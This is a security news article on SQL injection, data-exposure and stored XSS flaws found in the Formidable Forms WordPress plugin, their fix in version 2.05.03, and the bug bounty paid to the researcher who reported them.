Vulnerabilities in Formidable Forms Plugin Expose WordPress Sites to Attacks

Wordpress brand logo on computer screen. Man typing on the keyboard. WordPress is a free and open-source blogging tool and a content management system (CMS).

A security expert identified multiple vulnerabilities in the Formidable Forms WordPress plugin that put thousands of users at risk.

WordPress is the most popular content management system used by millions around the globe, and it is fully customizable with a large number of plugins available for users’ websites.

However, new vulnerabilities have been discovered for a popular plugin named Formidable Forms that rings the alarm bell for all of the plugin’s users.

Throughout the years, most WordPress users and administrators might have been familiar with the Formidable Forms plugin.

The developers of the plugin provide a free and a paid version of the program, which facilitates the easy creation forms, polls, surveys and other activities that require collecting information from a large group of users.

With more than 200,000 active monthly users, it is a viable target for hackers to gain large data sets and desired information.

The vulnerabilities in this particular plugin were identified by a company named Klikki Oy, a Finland-based cybersecurity entity.

The bad news is, not just one, but multiple vulnerabilities were identified in the plugin which could put the entire website under risk if exploited.

With millions of large-scale websites using WordPress as their primary content management tool, thousands of active users for the plugin, and only one admin panel to use to manage and upload content, it could easily bring down websites and possibly take hold of the data inside.

Among the many vulnerabilities, the security company’s representative Jouko Pynnönen, who found the issues, confirmed that the most threatening of them all is blind SQL injection.

Wordpress logo on smartphone screen placed on laptop keyboard

WordPress is the most popular content management system used by millions around the globe, and it is fully customizable with a large number of plugins available for users’ websites.

If exploited, this vulnerability will allow full access to the content on a website and a hacker may choose to do anything with what they have acquired.

It will also expose user credentials and data submitted by users using the Formidable Forms plugin.

An additional vulnerability can be exploited and allow a third party to read data that a user enters into the form.

The vulnerability is present due to the usage of shortcodes in the plugin, which was originally implemented to make it easier for users to customize WordPress sites with minimal difficulty, but is also easy to crack.

Apart from these issues, the Formidable Forms plugin also has XSS vulnerabilities.

The stored XSS on the CMS will allow a hacker to execute an arbitrary JavaScript code, which in turn will allow rogue codes to be inserted into the forms to easily take control of the website and form(s).

According to the development team of Formidable Forms, all of the identified vulnerabilities have been fixed following notification from the security expert.

The latest version of the plugin, 2.05.03, puts an end to all of the reported problems.

For his work, Pynnönen received a bounty of $4,500 and additional rewards for identifying the SQL injection and XSS vulnerabilities while taking part in the plugin’s HackerOne bug bounty program.

Leave a Reply